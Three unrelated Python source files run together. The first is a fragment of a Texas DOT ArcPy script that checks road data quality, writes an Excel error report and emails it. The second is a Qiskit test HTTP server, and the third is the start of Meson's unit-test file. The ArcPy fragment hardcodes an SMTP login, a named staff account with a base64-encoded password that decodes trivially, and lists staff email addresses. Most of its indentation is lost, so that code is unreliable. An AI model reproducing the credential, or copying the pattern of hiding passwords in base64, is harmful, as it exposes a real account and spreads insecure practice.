errorinfo.append(row.DIST_NBR)
errorinfo.append(row.RTE_ID)
errorinfo.append(row.RTE_CLASS)
errorinfo.append("RTE_ID should not be more than 6 characters long")
errors.append(errorinfo)
counter += 1
if row.RTE_NBR is None:
pass
elif len(row.RTE_NBR) > 1:
errorinfo = []
errorinfo.append(row.RTE_ID)
errorinfo.append(row.DIST_NBR)
errorinfo.append(row.RTE_NBR)
errorinfo.append(row.RTE_CLASS)
errorinfo.append("RTE_NBR should be blank")
errors.append(errorinfo)
counter += 1
arcpy.AddMessage(str(counter) + " off system attribute errors.")
d[offsysatt] = errors
except:
print "!!!OFFSYSTEM ATTRIBUTE FAILED!!!"
def screenlines(d):
try:
arcpy.AddMessage("Starting screen lines check...")
arcpy.CreateFileGDB_management(workspace, "SL_Working.gdb")
slbase = workspace + "\\SL_Working.gdb"
comancheSL = "Database Connections\\Connection to Comanche.sde\\TPP_GIS.APP_TPP_GIS_ADMIN.QAQC\\TPP_GIS.APP_TPP_GIS_ADMIN.Screen_Lines"
Screen_Lines = slbase + "\\Screen_Lines"
Screen_Join_Output_shp = slbase + "\\Screen_Join_Output"
OnSystem_Roadways = slbase + "\\OnSystem_Roadways"
Screen_Line_Intersect_shp = slbase + "\\Screen_Line_Intersect"
Screen_Line_Result_dbf = slbase + "\\Screen_Line_Result"
Screen_Lines_Summarized_dbf = slbase + "\\Screen_Lines_Summarized"
Output_Event_Table_Properties = "RID POINT MEAS"
print "Screen Lines (1/8): Exporting Screen Lines"
arcpy.FeatureClassToFeatureClass_conversion(comancheSL, slbase, "Screen_Lines")
print "Screen Lines (2/8): Joining with Districts from Comanche"
arcpy.SpatialJoin_analysis(Screen_Lines, txdotdist, Screen_Join_Output_shp, "JOIN_ONE_TO_ONE", "KEEP_ALL")
print "Screen Lines (3/8): Exporting On-System Roadways"
arcpy.FeatureClassToFeatureClass_conversion(txdotroads, slbase, "OnSystem_Roadways",
"""RTE_CLASS = '1' AND RTE_OPEN = 1""")
print "Screen Lines (4/8): Intersecting Screen Lines with Roadbeds"
arcpy.Intersect_analysis([OnSystem_Roadways, Screen_Join_Output_shp], Screen_Line_Intersect_shp, "ALL", "", "POINT")
print "Screen Lines (5/8): Locating Points along Routes"
arcpy.LocateFeaturesAlongRoutes_lr(Screen_Line_Intersect_shp, OnSystem_Roadways, "RTE_ID", "0 Meters",
Screen_Line_Result_dbf, Output_Event_Table_Properties)
print "Screen Lines (6/8): Calculating Summary Statistics"
arcpy.Statistics_analysis(Screen_Line_Result_dbf, Screen_Lines_Summarized_dbf,
"MEAS MIN;MEAS MAX;DIST_NM FIRST;DIST_NBR FIRST", "SCREEN_ID")
print "Screen Lines (7/8): Adding Difference Column"
arcpy.AddField_management(Screen_Lines_Summarized_dbf, "DIFFERENCE", "FLOAT")
# print "Calculating Difference Column"
# arcpy.CalculateField_management(Screen_Lines_Summarized_dbf, "DIFFERENCE", "Abs ([MAX_MEAS]- [MIN_MEAS])", "VB", "")
print "Screen Lines (8/8): Compiling Errors"
errors = []
cursor = arcpy.UpdateCursor(Screen_Lines_Summarized_dbf)
for row in cursor:
screen = row.getValue("SCREEN_ID")
minimum = row.getValue("MIN_MEAS")
maximum = row.getValue("MAX_MEAS")
distnm = row.getValue("FIRST_DIST_NM")
distnbr = row.getValue("FIRST_DIST_NBR")
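            # Interpretation of this check: a screen line crosses one or more roadbeds
            # of the same route, and if the route is calibrated consistently the located
            # measures at those crossings should be nearly identical, so a large
            # DIFFERENCE flags a measure problem for that SCREEN_ID.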
diff = abs(maximum - minimum)
thediff = format(float(diff), '.3f')
thisrow = [str(screen), str(minimum), str(maximum), str(distnm), str(distnbr), str(thediff)]
errors.append(thisrow)
row.setValue("DIFFERENCE", thediff)
cursor.updateRow(row)
del cursor
del row
d[screenlines] = errors
print "time to return"
except:
print "!!!SCREEN LINES FAILED!!!"
def assemblereport(check1, check2, check3, check4, check5, check6, check7, check8, check9):
global book
arcpy.AddMessage("Beginning error checks...")
if check1 == "true":
check2 = "true"
check3 = "true"
check4 = "true"
check5 = "true"
check6 = "true"
check7 = "true"
check8 = "true"
check9 = "true"
font = xlwt.Font() # Create the Font
font.name = 'Calibri'
font.height = 240 # =point size you want * 20
style = xlwt.XFStyle() # Create the Style
style.font = font # Apply the Font to the Style
    # multiprocessing.Queue does not support item assignment; the worker
    # functions each store their error list keyed by function (d[worker] = errors),
    # so share a Manager dictionary between the processes instead.
    manager = multiprocessing.Manager()
    d = manager.dict()
started = []
if check2 == "true":
p = multiprocessing.Process(target=overlap, args=(d,))
p.start()
started.append(p)
if check3 == "true":
p = multiprocessing.Process(target=routeopen, args=(d,))
p.start()
started.append(p)
if check4 == "true":
p = multiprocessing.Process(target=measurelength, args=(d,))
p.start()
started.append(p)
if check5 == "true":
p = multiprocessing.Process(target=subfilelength, args=(d,))
p.start()
started.append(p)
if check6 == "true":
p = multiprocessing.Process(target=removevertices, args=(d,))
p.start()
started.append(p)
if check7 == "true":
p = multiprocessing.Process(target=onsystem, args=(d,))
p.start()
started.append(p)
if check8 == "true":
p = multiprocessing.Process(target=offsysatt, args=(d,))
p.start()
started.append(p)
if check9 == "true":
p = multiprocessing.Process(target=screenlines, args=(d,))
p.start()
started.append(p)
for i in started:
i.join()
    arcpy.AddMessage("Checks complete. Compiling report page for:")
    if check2 == "true":
        arcpy.AddMessage("Overlap Errors...")
        overlapsheet = book.add_sheet("City Boundary Overlap")
        oeline = 0
        overlapsheet.write(oeline, 0, "RTE_ID", style=style)
        overlapsheet.write(oeline, 1, "Overlap Length", style=style)
        overlapsheet.write(oeline, 2, "District Name", style=style)
        overlapsheet.write(oeline, 3, "District Number", style=style)
        overlapsheet.write(oeline, 4, "City Name", style=style)
        overlapsheet.write(oeline, 5, "City Number", style=style)
        overlapsheet.write(oeline, 7,
                           "The following Route IDs are County Roads and FC Streets which cross a City Boundary as found in City_OverlapErrors.shp",
                           style=style)
        oeline += 1
        # Assumes the overlap worker stores its rows the same way as the other
        # checks, i.e. d[overlap] = errors.
        overlaplist = d[overlap]
        for i in overlaplist:
            if i[3] not in disterrors:
                disterrors.append(i[3])
            overlapsheet.write(oeline, 0, i[0], style=style)
            overlapsheet.write(oeline, 1, i[1], style=style)
            overlapsheet.write(oeline, 2, i[2], style=style)
            overlapsheet.write(oeline, 3, i[3], style=style)
            overlapsheet.write(oeline, 4, i[4], style=style)
            overlapsheet.write(oeline, 5, i[5], style=style)
            oeline += 1
if check3 == "true":
arcpy.AddMessage("Route Open Errors...")
opensheet = book.add_sheet("Route Open")
roline = 0
opensheet.write(roline, 0, "RTE_ID", style=style)
opensheet.write(roline, 1, "RTE_OPEN", style=style)
opensheet.write(roline, 2, "HIGHWAY_STATUS", style=style)
opensheet.write(roline, 3, "Description", style=style)
opensheet.write(roline, 4, "District Number", style=style)
opensheet.write(roline, 6,
"The following Route IDs contain an error between RTE_OPEN in TxDOT_Roadways and ROADWAY_STATUS in SUBFILES",
style=style)
roline += 1
openlist = d[routeopen]
for i in openlist:
if i[4] not in disterrors:
disterrors.append(i[4])
opensheet.write(roline, 0, i[0], style=style)
opensheet.write(roline, 1, i[1], style=style)
opensheet.write(roline, 2, i[2], style=style)
opensheet.write(roline, 3, i[3], style=style)
opensheet.write(roline, 4, i[4], style=style)
roline += 1
if check4 == "true":
arcpy.AddMessage("OffSystem Geometry & Measure Errors...")
geomsheet = book.add_sheet("OffSystem Geometry & Measures")
ogline = 0
geomsheet.write(ogline, 0, "RTE_ID", style=style)
geomsheet.write(ogline, 1, "Measures' Length", style=style)
geomsheet.write(ogline, 2, "Shape Length", style=style)
geomsheet.write(ogline, 3, "RTE_LEN", style=style)
geomsheet.write(ogline, 4, "District Name", style=style)
geomsheet.write(ogline, 5, "District Number", style=style)
geomsheet.write(ogline, 6, "Difference", style=style)
geomsheet.write(ogline, 8,
"The following Route IDs contain an error between their measures' length, shape length, and RTE_LEN",
style=style)
ogline += 1
geomlist = d[measurelength]
for i in geomlist:
if i[5] not in disterrors:
disterrors.append(i[5])
geomsheet.write(ogline, 0, i[0], style=style)
geomsheet.write(ogline, 1, i[1], style=style)
geomsheet.write(ogline, 2, i[2], style=style)
geomsheet.write(ogline, 3, i[3], style=style)
geomsheet.write(ogline, 4, i[4], style=style)
geomsheet.write(ogline, 5, i[5], style=style)
geomsheet.write(ogline, 6, i[6], style=style)
ogline += 1
if check5 == "true":
arcpy.AddMessage("Subfile Length Errors...")
subsheet = book.add_sheet("Subfile Lengths")
sfline = 0
subsheet.write(sfline, 0, "RTE_ID", style=style)
subsheet.write(sfline, 1, "District Number", style=style)
subsheet.write(sfline, 2, "BMP", style=style)
subsheet.write(sfline, 3, "Min Measure", style=style)
subsheet.write(sfline, 4, "EMP", style=style)
subsheet.write(sfline, 5, "Max Measure", style=style)
subsheet.write(sfline, 6, "Subfile Len", style=style)
subsheet.write(sfline, 7, "RTE_LEN", style=style)
subsheet.write(sfline, 8, "Description", style=style)
subsheet.write(sfline, 10, "The following Route IDs contain an error between their line and SUBFILES lengths",
style=style)
sfline += 1
sublist = d[subfilelength]
for i in sublist:
if i[1] not in disterrors:
disterrors.append(i[1])
subsheet.write(sfline, 0, i[0], style=style)
subsheet.write(sfline, 1, i[1], style=style)
subsheet.write(sfline, 2, i[2], style=style)
subsheet.write(sfline, 3, i[3], style=style)
subsheet.write(sfline, 4, i[4], style=style)
subsheet.write(sfline, 5, i[5], style=style)
subsheet.write(sfline, 6, i[6], style=style)
subsheet.write(sfline, 7, i[7], style=style)
subsheet.write(sfline, 8, i[8], style=style)
sfline += 1
if check6 == "true":
arcpy.AddMessage("Multipart Errors and Measure Errors...")
multisheet = book.add_sheet("Multipart & Measure Errors")
mmline = 0
multisheet.write(mmline, 0, "OBJECTID", style=style)
multisheet.write(mmline, 1, "RTE_ID", style=style)
multisheet.write(mmline, 2, "District Name", style=style)
multisheet.write(mmline, 3, "District Number", style=style)
multisheet.write(mmline, 4, "Description", style=style)
multisheet.write(mmline, 6, "The following Object IDs are multipart features or have measure errors.",
style=style)
mmline += 1
multilist = d[removevertices]
for i in multilist:
if i[3] not in disterrors:
disterrors.append(i[3])
multisheet.write(mmline, 0, i[0], style=style)
multisheet.write(mmline, 1, i[1], style=style)
multisheet.write(mmline, 2, i[2], style=style)
multisheet.write(mmline, 3, i[3], style=style)
multisheet.write(mmline, 4, i[4], style=style)
mmline += 1
if check7 == "true":
arcpy.AddMessage("OnSystem Attribute and Geometry & Measure Checks...")
onsysatt = book.add_sheet("OnSystem Attributes")
onsysmeas = book.add_sheet("OnSystem Geometry & Measures")
online = 0
onsysatt.write(online, 0, "RTE_ID", style=style)
onsysatt.write(online, 1, "District Number", style=style)
onsysatt.write(online, 2, "Comparison Field", style=style)
onsysatt.write(online, 3, "Comparison Field", style=style)
onsysatt.write(online, 4, "Description", style=style)
onsysatt.write(online, 6, "The following Object IDs are on-system attribute errors.", style=style)
onsysmeas.write(online, 0, "RTE_ID", style=style)
onsysmeas.write(online, 1, "Measures' Length", style=style)
onsysmeas.write(online, 2, "Shape Length", style=style)
onsysmeas.write(online, 3, "RTE_LEN", style=style)
onsysmeas.write(online, 4, "District Name", style=style)
onsysmeas.write(online, 5, "District Number", style=style)
onsysmeas.write(online, 6, "Difference", style=style)
onsysmeas.write(online, 8,
"The following Route IDs contain an error between their measures' length, shape length, and RTE_LEN",
style=style)
online += 1
onsyslist = d[onsystem]
atty = onsyslist[0]
measy = onsyslist[1]
for i in atty:
if i[1] not in disterrors:
disterrors.append(i[1])
onsysatt.write(online, 0, i[0], style=style)
onsysatt.write(online, 1, i[1], style=style)
onsysatt.write(online, 2, i[2], style=style)
onsysatt.write(online, 3, i[3], style=style)
onsysatt.write(online, 4, i[4], style=style)
online += 1
online = 1
for i in measy:
if i[5] not in disterrors:
disterrors.append(i[5])
onsysmeas.write(online, 0, i[0], style=style)
onsysmeas.write(online, 1, i[1], style=style)
onsysmeas.write(online, 2, i[2], style=style)
onsysmeas.write(online, 3, i[3], style=style)
onsysmeas.write(online, 4, i[4], style=style)
onsysmeas.write(online, 5, i[5], style=style)
onsysmeas.write(online, 6, i[6], style=style)
online += 1
if check8 == "true":
arcpy.AddMessage("OffSystem Attribute Checks...")
offatt = book.add_sheet("OffSystem Attributes")
oaline = 0
offatt.write(oaline, 0, "RTE_ID", style=style)
offatt.write(oaline, 1, "District Number", style=style)
offatt.write(oaline, 2, "Comparison Field", style=style)
offatt.write(oaline, 3, "Comparison Field", style=style)
offatt.write(oaline, 4, "Description", style=style)
offatt.write(oaline, 6, "The following Object IDs are off-system attribute errors.", style=style)
oaline += 1
offattlist = d[offsysatt]
for i in offattlist:
if i[1] not in disterrors:
disterrors.append(i[1])
offatt.write(oaline, 0, i[0], style=style)
offatt.write(oaline, 1, i[1], style=style)
offatt.write(oaline, 2, i[2], style=style)
offatt.write(oaline, 3, i[3], style=style)
offatt.write(oaline, 4, i[4], style=style)
oaline += 1
if check9 == "true":
arcpy.AddMessage("Screen Line Checks...")
sline = book.add_sheet("Screen Lines")
scline = 0
sline.write(scline, 0, "SCREEN_ID", style=style)
sline.write(scline, 1, "Min_Meas", style=style)
sline.write(scline, 2, "Max_Meas", style=style)
sline.write(scline, 3, "Dist_Name", style=style)
sline.write(scline, 4, "Dist_Nbr", style=style)
sline.write(scline, 5, "Difference", style=style)
sline.write(scline, 6, "The following are screen line errors.", style=style)
scline += 1
slinelist = d[screenlines]
for i in slinelist:
if i[4] not in disterrors:
disterrors.append(i[4])
sline.write(scline, 0, i[0], style=style)
sline.write(scline, 1, i[1], style=style)
sline.write(scline, 2, i[2], style=style)
sline.write(scline, 3, i[3], style=style)
sline.write(scline, 4, i[4], style=style)
sline.write(scline, 5, i[5], style=style)
scline += 1
return
def email():
try:
tdrive = "T:\\DATAMGT\\MAPPING\\Data Quality Checks\\Errors_" + str(today)
shutil.copytree(workspace, tdrive, ignore=shutil.ignore_patterns('*.gdb'))
print "Copied to T Drive."
analyst = {}
analyst[1] = 'Tom.Neville@txdot.gov'
analyst[2] = 'Chris.Bardash@txdot.gov'
analyst[3] = 'David.Messineo@txdot.gov'
analyst[4] = 'Richard.Barrientos@txdot.gov'
analyst[5] = 'Richard.Barrientos@txdot.gov'
analyst[6] = 'Jason.Ferrell@txdot.gov'
analyst[7] = 'Jason.Kleinert@txdot.gov'
analyst[8] = 'Jason.Kleinert@txdot.gov'
analyst[9] = 'Samuel.Bogle@txdot.gov'
analyst[10] = 'Jeff.Wilhelm@txdot.gov'
analyst[11] = 'Jeremy.Rogers@txdot.gov'
analyst[12] = 'Aja.Davidson@txdot.gov'
analyst[13] = 'Jennifer.Sylvester@txdot.gov'
analyst[14] = 'Jennifer.Sylvester@txdot.gov'
analyst[15] = 'Travis.Scruggs@txdot.gov'
analyst[16] = 'David.Hickman@txdot.gov'
analyst[17] = 'Aja.Davidson@txdot.gov'
analyst[18] = 'Tom.Neville@txdot.gov'
analyst[19] = 'Jeff.Wilhelm@txdot.gov'
analyst[20] = 'Jeremy.Rogers@txdot.gov'
analyst[21] = 'David.Hickman@txdot.gov'
analyst[22] = 'Travis.Scruggs@txdot.gov'
analyst[23] = 'Samuel.Bogle@txdot.gov'
analyst[24] = 'Jason.Ferrell@txdot.gov'
analyst[25] = 'David.Messineo@txdot.gov'
# TO = []
# for n in disterrors:
# address = analyst[n]
# if address not in TO:
# TO.append(address)
FROM = 'adam.breznicky@txdot.gov'
TO = ['adam.breznicky@txdot.gov']
SUBJECT = "Error Checks for " + runday
TEXT = "You are receiving this email because your district(s) was listed within the error checks run on " \
+ runday + ".\nPlease review the error checks report and fix all errors within your district at your" \
" earliest convenience.\nYou can find a copy of the Error Checks here:\n\n" \
+ tdrive + "\n\nLove, Adam"
message = """\From: %s\nTo: %s\nSubject: %s\n\n%s
""" % (FROM, ", ".join(TO), SUBJECT, TEXT)
username = "adam.breznicky@txdot.gov"
password = base64.b64decode("U2F0dXJkYXkxMjM=")
server = smtplib.SMTP('owa.txdot.gov', 25)
server.ehlo()
server.starttls()
server.ehlo()
server.login(username, password)
server.sendmail(FROM, TO, message)
server.close()
print "Emails delivered."
except:
arcpy.AddMessage("Failed to copy to the T-Drive and send emails.")
book = xlwt.Workbook()
if __name__ == '__main__':
nowS = datetime.datetime.now()
arcpy.AddMessage("and away we go... " + str(nowS))
copylocal()
assemblereport(allchecks, cityoverlaps, routeopens, offgeommeas, sublen, multimeasPNG, onattmeas, offatt, scnln)
print "Saving excel error report..."
    book.save(workspace + "\\ErrorReport_" + str(today) + ".xls")
email()
now = datetime.datetime.now()
arcpy.AddMessage("that's all folks!")
arcpy.AddMessage("started: " + str(nowS))
arcpy.AddMessage("finished: " + str(now))
|
http_server.py
|
# This code is part of Qiskit.
#
# (C) Copyright IBM 2021.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
"""HTTP server for testing purposes."""
import json
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
from typing import Dict
class BaseHandler(BaseHTTPRequestHandler):
"""Base request handler for testing."""
good_response = {}
error_response = {}
def _get_code(self):
"""Get the status code to be returned."""
return 200
def _get_response_data(self):
"""Get the response data to be returned."""
return self.good_response
def _get_error_data(self):
"""Get the error data to be returned."""
return self.error_response
def _respond(self):
"""Respond to the client."""
code = self._get_code()
self.send_response(code)
self.send_header("Content-type", "application/json")
self.end_headers()
self.rfile.read(int(self.headers.get("Content-Length", 0)))
data = self._get_response_data() if code == 200 else self._get_error_data()
self.wfile.write(json.dumps(data).encode(encoding="utf_8"))
def do_GET(self):
"""Process a GET request."""
# pylint: disable=invalid-name
self._respond()
def do_POST(self):
"""Process a POST request."""
# pylint: disable=invalid-name
self._respond()
def do_PUT(self):
"""Process a PUT request."""
# pylint: disable=invalid-name
self._respond()
class ServerErrorOnceHandler(BaseHandler):
"""Request handler that returns a server error once then a good response."""
bad_status_given = {}
def _get_code(self):
"""Return 200 if the path was seen before, otherwise 504."""
if self.bad_status_given.get(self.path):
return 200
self.bad_status_given[self.path] = True
return 504
class ClientErrorHandler(BaseHandler):
"""Request handler that returns a client error."""
def _get_code(self):
"""Return 400."""
return 400
class SimpleServer:
"""A simple test HTTP server."""
IP_ADDRESS = "127.0.0.1"
PORT = 8123
URL = "http://{}:{}".format(IP_ADDRESS, PORT)
def __init__(self, handler_class: BaseHandler):
"""SimpleServer constructor.
Args:
handler_class: Request handler class.
"""
self.httpd = HTTPServer((self.IP_ADDRESS, self.PORT), handler_class)
self.server = threading.Thread(target=self.httpd.serve_forever, daemon=True)
def start(self):
"""Start the server."""
self.server.start()
def stop(self):
"""Stop the server."""
self.httpd.shutdown()
self.server.join(3)
self.httpd.server_close()
def set_error_response(self, error_response: Dict):
"""Set the error response."""
setattr(self.httpd.RequestHandlerClass, "error_response", error_response)
def set_good_response(self, response: Dict):
"""Set good response."""
setattr(self.httpd.RequestHandlerClass, "good_response", response)
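# Illustrative only (not part of the original module): a minimal sketch of how
# this helper might be exercised directly. The urlopen call and the JSON body
# used here are placeholders chosen for this example.
if __name__ == "__main__":
    from urllib.request import urlopen

    demo = SimpleServer(handler_class=BaseHandler)
    demo.set_good_response({"status": "ok"})
    demo.start()
    try:
        with urlopen(SimpleServer.URL, timeout=5) as resp:
            print(resp.read().decode("utf-8"))  # expected: {"status": "ok"}
    finally:
        demo.stop()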
|
run_unittests.py
|
#!/usr/bin/env python3
# Copyright 2016-2017 The Meson development team
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import time
import stat
import subprocess
import re
import json
import tempfile
import textwrap
import os
import shutil
import sys
import unittest
import platform
import pickle
import functools
import io
import operator
import threading
import urllib.error
import urllib.request
import zipfile
import hashlib
from itertools import chain
from unittest import mock
from configparser import ConfigParser
from contextlib import contextmanager
from glob import glob
from pathlib import (PurePath, Path)
from distutils.dir_util import copy_tree
import typing as T
import mesonbuild.mlog
import mesonbuild.depfile
import mesonbuild.dependencies.base
import mesonbuild.compilers
import mesonbuild.envconfig
import mesonbuild.environment
import mesonbuild.mesonlib
import mesonbuild.coredata
import mesonbuild.modules.gnome
from mesonbuild.interpreter import Interpreter, ObjectHolder
from mesonbuild.ast import AstInterpreter
from mesonbuild.mesonlib import (
BuildDirLock, LibType, MachineChoice, PerMachine, Version, is_windows,
is_osx, is_cygwin, is_dragonflybsd, is_openbsd, is_haiku, is_sunos,
windows_proof_rmtree, python_command, version_compare, split_args,
quote_arg, relpath, is_linux, git, GIT
)
from mesonbuild.environment import detect_ninja
from mesonbuild.mesonlib import MesonException, EnvironmentException
from mesonbuild.dependencies import PkgConfigDependency, ExternalProgram
import mesonbuild.dependencies.base
from mesonbuild.build import Target, ConfigurationData
import mesonbuild.modules.pkgconfig
from mesonbuild.mtest import TAPParser, TestResult
from run_tests import (
Backend, FakeBuild, FakeCompilerOptions,
ensure_backend_detects_changes, exe_suffix, get_backend_commands,
get_builddir_target_args, get_fake_env, get_fake_options, get_meson_script,
run_configure_inprocess, run_mtest_inprocess
)
URLOPEN_TIMEOUT = 5
@contextmanager
def chdir(path: str):
curdir = os.getcwd()
os.chdir(path)
try:
yield
finally:
os.chdir(curdir)
def get_dynamic_section_entry(fname, entry):
if is_cygwin() or is_osx():
raise unittest.SkipTest('Test only applicable to ELF platforms')
try:
raw_out = subprocess.check_output(['readelf', '-d', fname],
universal_newlines=True)
except FileNotFoundError:
# FIXME: Try using depfixer.py:Elf() as a fallback
raise unittest.SkipTest('readelf not found')
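    # readelf -d prints lines such as
    #   0x000000000000000e (SONAME)  Library soname: [libfoo.so.6]
    # so capture whatever appears between the brackets after the requested entry.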
pattern = re.compile(entry + r': \[(.*?)\]')
for line in raw_out.split('\n'):
m = pattern.search(line)
if m is not None:
return m.group(1)
return None # The file did not contain the specified entry.
def get_soname(fname):
return get_dynamic_section_entry(fname, 'soname')
def get_rpath(fname):
return get_dynamic_section_entry(fname, r'(?:rpath|runpath)')
def is_tarball():
if not os.path.isdir('docs'):
return True
return False
def is_ci():
if 'CI' in os.environ:
return True
return False
def is_pull():
# Travis
if os.environ.get('TRAVIS_PULL_REQUEST', 'false') != 'false':
return True
# Azure
if 'SYSTEM_PULLREQUEST_ISFORK' in os.environ:
return True
return False
def _git_init(project_dir):
subprocess.check_call(['git', 'init'], cwd=project_dir, stdout=subprocess.DEVNULL)
subprocess.check_call(['git', 'config',
'user.name', 'Author Person'], cwd=project_dir)
subprocess.check_call(['git', 'config',
'user.email', 'teh_coderz@example.com'], cwd=project_dir)
subprocess.check_call('git add *', cwd=project_dir, shell=True,
stdout=subprocess.DEVNULL)
subprocess.check_call(['git', 'commit', '-a', '-m', 'I am a project'], cwd=project_dir,
stdout=subprocess.DEVNULL)
@functools.lru_cache()
def is_real_gnu_compiler(path):
'''
Check if the gcc we have is a real gcc and not a macOS wrapper around clang
'''
if not path:
return False
out = subprocess.check_output([path, '--version'], universal_newlines=True, stderr=subprocess.STDOUT)
return 'Free Software Foundation' in out
def skipIfNoExecutable(exename):
'''
Skip this test if the given executable is not found.
'''
def wrapper(func):
@functools.wraps(func)
def wrapped(*args, **kwargs):
if shutil.which(exename) is None:
raise unittest.SkipTest(exename + ' not found')
return func(*args, **kwargs)
return wrapped
return wrapper
def skipIfNoPkgconfig(f):
'''
Skip this test if no pkg-config is found, unless we're on CI.
This allows users to run our test suite without having
pkg-config installed on, f.ex., macOS, while ensuring that our CI does not
silently skip the test because of misconfiguration.
Note: Yes, we provide pkg-config even while running Windows CI
'''
@functools.wraps(f)
def wrapped(*args, **kwargs):
if not is_ci() and shutil.which('pkg-config') is None:
raise unittest.SkipTest('pkg-config not found')
return f(*args, **kwargs)
return wrapped
def skipIfNoPkgconfigDep(depname):
'''
Skip this test if the given pkg-config dep is not found, unless we're on CI.
'''
def wrapper(func):
@functools.wraps(func)
def wrapped(*args, **kwargs):
if not is_ci() and shutil.which('pkg-config') is None:
raise unittest.SkipTest('pkg-config not found')
if not is_ci() and subprocess.call(['pkg-config', '--exists', depname]) != 0:
raise unittest.SkipTest('pkg-config dependency {} not found.'.format(depname))
return func(*args, **kwargs)
return wrapped
return wrapper
def skip_if_no_cmake(f):
'''
Skip this test if no cmake is found, unless we're on CI.
This allows users to run our test suite without having
cmake installed on, f.ex., macOS, while ensuring that our CI does not
silently skip the test because of misconfiguration.
'''
@functools.wraps(f)
def wrapped(*args, **kwargs):
if not is_ci() and shutil.which('cmake') is None:
raise unittest.SkipTest('cmake not found')
return f(*args, **kwargs)
return wrapped
def skip_if_not_language(lang):
def wrapper(func):
@functools.wraps(func)
def wrapped(*args, **kwargs):
try:
env = get_fake_env()
f = getattr(env, 'detect_{}_compiler'.format(lang))
f(MachineChoice.HOST)
except EnvironmentException:
raise unittest.SkipTest('No {} compiler found.'.format(lang))
return func(*args, **kwargs)
return wrapped
return wrapper
def skip_if_env_set(key):
'''
Skip a test if a particular env is set, except when running under CI
'''
def wrapper(func):
@functools.wraps(func)
def wrapped(*args, **kwargs):
old = None
if key in os.environ:
if not is_ci():
raise unittest.SkipTest('Env var {!r} set, skipping'.format(key))
old = os.environ.pop(key)
try:
return func(*args, **kwargs)
finally:
if old is not None:
os.environ[key] = old
return wrapped
return wrapper
def skip_if_not_base_option(feature):
"""Skip tests if The compiler does not support a given base option.
for example, ICC doesn't currently support b_sanitize.
"""
def actual(f):
@functools.wraps(f)
def wrapped(*args, **kwargs):
env = get_fake_env()
cc = env.detect_c_compiler(MachineChoice.HOST)
if feature not in cc.base_options:
raise unittest.SkipTest(
'{} not available with {}'.format(feature, cc.id))
return f(*args, **kwargs)
return wrapped
return actual
@contextmanager
def temp_filename():
'''A context manager which provides a filename to an empty temporary file.
On exit the file will be deleted.
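
    Example (illustrative):

        with temp_filename() as fname:
            with open(fname, 'w') as f:
                f.write('scratch data')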
'''
fd, filename = tempfile.mkstemp()
os.close(fd)
try:
yield filename
finally:
try:
os.remove(filename)
except OSError:
pass
@contextmanager
def no_pkgconfig():
'''
A context manager that overrides shutil.which and ExternalProgram to force
them to return None for pkg-config to simulate it not existing.
'''
old_which = shutil.which
old_search = ExternalProgram._search
def new_search(self, name, search_dir):
if name == 'pkg-config':
return [None]
return old_search(self, name, search_dir)
def new_which(cmd, *kwargs):
if cmd == 'pkg-config':
return None
return old_which(cmd, *kwargs)
shutil.which = new_which
ExternalProgram._search = new_search
try:
yield
finally:
shutil.which = old_which
ExternalProgram._search = old_search
class InternalTests(unittest.TestCase):
def test_version_number(self):
searchfunc = mesonbuild.environment.search_version
self.assertEqual(searchfunc('foobar 1.2.3'), '1.2.3')
self.assertEqual(searchfunc('1.2.3'), '1.2.3')
self.assertEqual(searchfunc('foobar 2016.10.28 1.2.3'), '1.2.3')
self.assertEqual(searchfunc('2016.10.28 1.2.3'), '1.2.3')
self.assertEqual(searchfunc('foobar 2016.10.128'), '2016.10.128')
self.assertEqual(searchfunc('2016.10.128'), '2016.10.128')
self.assertEqual(searchfunc('2016.10'), '2016.10')
self.assertEqual(searchfunc('2016.10 1.2.3'), '1.2.3')
self.assertEqual(searchfunc('oops v1.2.3'), '1.2.3')
self.assertEqual(searchfunc('2016.oops 1.2.3'), '1.2.3')
self.assertEqual(searchfunc('2016.x'), 'unknown version')
def test_mode_symbolic_to_bits(self):
modefunc = mesonbuild.mesonlib.FileMode.perms_s_to_bits
self.assertEqual(modefunc('---------'), 0)
self.assertEqual(modefunc('r--------'), stat.S_IRUSR)
self.assertEqual(modefunc('---r-----'), stat.S_IRGRP)
self.assertEqual(modefunc('------r--'), stat.S_IROTH)
self.assertEqual(modefunc('-w-------'), stat.S_IWUSR)
self.assertEqual(modefunc('----w----'), stat.S_IWGRP)
self.assertEqual(modefunc('-------w-'), stat.S_IWOTH)
self.assertEqual(modefunc('--x------'), stat.S_IXUSR)
self.assertEqual(modefunc('-----x---'), stat.S_IXGRP)
self.assertEqual(modefunc('--------x'), stat.S_IXOTH)
self.assertEqual(modefunc('--S------'), stat.S_ISUID)
self.assertEqual(modefunc('-----S---'), stat.S_ISGID)
self.assertEqual(modefunc('--------T'), stat.S_ISVTX)
self.assertEqual(modefunc('--s------'), stat.S_ISUID | stat.S_IXUSR)
self.assertEqual(modefunc('-----s---'), stat.S_ISGID | stat.S_IXGRP)
self.assertEqual(modefunc('--------t'), stat.S_ISVTX | stat.S_IXOTH)
self.assertEqual(modefunc('rwx------'), stat.S_IRWXU)
self.assertEqual(modefunc('---rwx---'), stat.S_IRWXG)
self.assertEqual(modefunc('------rwx'), stat.S_IRWXO)
# We could keep listing combinations exhaustively but that seems
# tedious and pointless. Just test a few more.
self.assertEqual(modefunc('rwxr-xr-x'),
stat.S_IRWXU |
stat.S_IRGRP | stat.S_IXGRP |
stat.S_IROTH | stat.S_IXOTH)
self.assertEqual(modefunc('rw-r--r--'),
stat.S_IRUSR | stat.S_IWUSR |
stat.S_IRGRP |
stat.S_IROTH)
self.assertEqual(modefunc('rwsr-x---'),
stat.S_IRWXU | stat.S_ISUID |
stat.S_IRGRP | stat.S_IXGRP)
def test_compiler_args_class_none_flush(self):
cc = mesonbuild.compilers.CCompiler([], 'fake', False, MachineChoice.HOST, mock.Mock())
a = cc.compiler_args(['-I.'])
        # First, check that the tree construction deduplicates the correct -I argument
a += ['-I..']
a += ['-I./tests/']
